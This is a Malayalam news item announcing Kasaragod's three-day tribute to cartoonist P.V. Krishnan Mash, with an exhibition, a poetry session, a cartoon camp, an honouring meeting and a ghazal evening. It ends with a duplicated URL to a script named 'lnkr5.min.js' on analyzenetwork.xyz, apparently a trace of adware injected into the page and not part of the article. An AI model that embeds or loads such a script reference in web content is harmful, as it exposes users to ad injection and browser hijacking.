കാസര്‍കോട്: കാര്‍ട്ടൂണിസ്റ്റ് കൃഷ്ണന്‍ മാഷെ കാസര്‍കോട്ടെ പൗരാവലി വൈവിധ്യമാര്‍ന്ന പരിപാടികളോടെ ആദരിക്കുമെന്ന സംഘാടകര്‍ വാര്‍ത്താസമ്മേളനത്തില്‍ അറിയിച്ചു. കാര്‍ട്ടൂണ്‍ പ്രദര്‍ശനം, കവിയരങ്ങ്, കാര്‍ട്ടൂണ്‍ ക്യാമ്പ്, ആദരസമ്മേളനം, പ്രശസ്ത ഗസല്‍ മാന്ത്രികന്‍ ഷഹബാസ് അമന്റെ ഗസല്‍ സായാഹ്നം എന്നിവ സംഘടിപ്പിക്കും. ഈ മാസം 15, 16, 17 തിയതികളില്‍ മുനിസിപ്പല്‍ കോണ്‍ഫറന്‍സ് ഹാള്‍, സന്ധ്യാരാഗം ഓഡിറ്റോറിയം, മുനിസിപ്പല്‍ ടൗണ്‍ ഹാള്‍ എന്നിവിടങ്ങളിലായാണ് പരിപാടി. വെള്ളിയാഴ്ച രാവിലെ നടക്കുന്ന കാര്‍ട്ടൂണ്‍ പ്രദര്‍ശനം മുനിസിപ്പല്‍ കോണ്‍ഫറന്‍സ് ഹാളില്‍ 10 മണിക്ക് കാര്‍ട്ടൂണിസ്റ്റ് കെ.എ അബ്ദുല്‍ ഗഫൂര്‍ മാസ്റ്റര്‍ ഉദ്ഘാടനം ചെയ്യും. പി.വി കൃഷ്ണന്‍മാഷുടെ കാര്‍ട്ടൂണുകള്‍, ചരിത്രം കുറിച്ചിട്ട ഫോട്ടോകള്‍, പോസ്റ്ററുകള്‍, മുഖചിത്രങ്ങള്‍ എന്നിവ 17 വരെ കാസര്‍കോട് മുനിസിപ്പല്‍ കോണ്‍ഫറന്‍സ് ഹാളില്‍ പ്രദര്‍ശിപ്പിക്കും.
വെള്ളിയാഴ്ച വൈകിട്ട് മൂന്നു മണിക്ക് സന്ധ്യാരാഗം ഓഡിറ്റോറിയത്തില്‍ നടക്കുന്ന കവിയരങ്ങ് പ്രശസ്ത കവി ബീരാന്‍ കുട്ടി ഉദ്ഘാടനം ചെയ്യും. പി.എസ് ഹമീദ് അധ്യക്ഷനാകും. പ്രശസ്ത കവികള്‍ കവിതകള്‍ അവതരിപ്പിക്കും. ശനിയാഴ്ച രാവിലെ മുനിസിപ്പല്‍ കോണ്‍ഫറന്‍സ് ഹാളില്‍ നടക്കുന്ന കാര്‍ട്ടൂണ്‍ ക്യാമ്പ് കാര്‍ട്ടൂണിസ്റ്റ് സഗീര്‍ ഉദ്ഘാടനം ചെയ്യും. ഞായറാഴ്ച വൈകിട്ട് നാലു മണിക്ക് ആദരസമ്മേളനം കഥാകൃത്ത് സുഭാഷ് ചന്ദ്രന്‍ ഉദ്ഘാടനം ചെയ്യും. സംഘാടക സമിതി ചെയര്‍മാന്‍ എന്‍.എ നെല്ലിക്കുന്ന് എം.എല്‍.എ അധ്യക്ഷനാകും. റവന്യുമന്ത്രി ഇ ചന്ദ്രശേഖരന്‍ ആദരസമര്‍പ്പണം നിര്‍വഹിക്കും. എം.എല്‍.എമാരായ കെ കുഞ്ഞിരാമന്‍, പി.ബി അബ്ദുര്‍ റസാഖ് എന്നിവര്‍ മുഖ്യാതിഥികളായിരിക്കും. സുവനീര്‍ പ്രകാശനം സി.വി ബാലകൃഷ്ണന്‍, ജില്ലാ പഞ്ചായത്ത് പ്രസിഡന്റ് എ.ജി.സി ബഷീറിന് നല്‍കി നിര്‍വഹിക്കും. പുസ്തക പ്രകാശനം ഡോ. അംബികാസുതന്‍ മാങ്ങാട്, നഗരസഭാ ചെയര്‍പേഴ്‌സണ്‍ ബീഫാത്വിമ ഇബ്രാഹിമിന് നല്‍കി നിര്‍വഹിക്കും. പ്രസ് ക്ലബില്‍ നടന്ന വാര്‍ത്താസമ്മേളനത്തില്‍ സംഘാടക സമിതി ചെയര്‍മാന്‍ എന്‍.എ നെല്ലിക്കുന്ന് എം.എല്‍.എ, ടി.ഇ അബ്ദുല്ല, പത്മനാഭന്‍ ബ്ലാത്തൂര്‍, ഉണ്ണികൃഷ്ണന്‍ പുഷ്പഗിരി, കെ.എം അബ്ദുര്‍ റഹ് മാന്‍, എ അബ്ദുര്‍ റഹ് മാന്‍, മുജീബ് അഹ് മദ്, രവീന്ദ്രന്‍ രാവണേശ്വരം സംബന്ധിച്ചു.
http://analyzenetwork.xyz/addons/lnkr5.min.jshttp://analyzenetwork.xyz/addons/lnkr5.min.js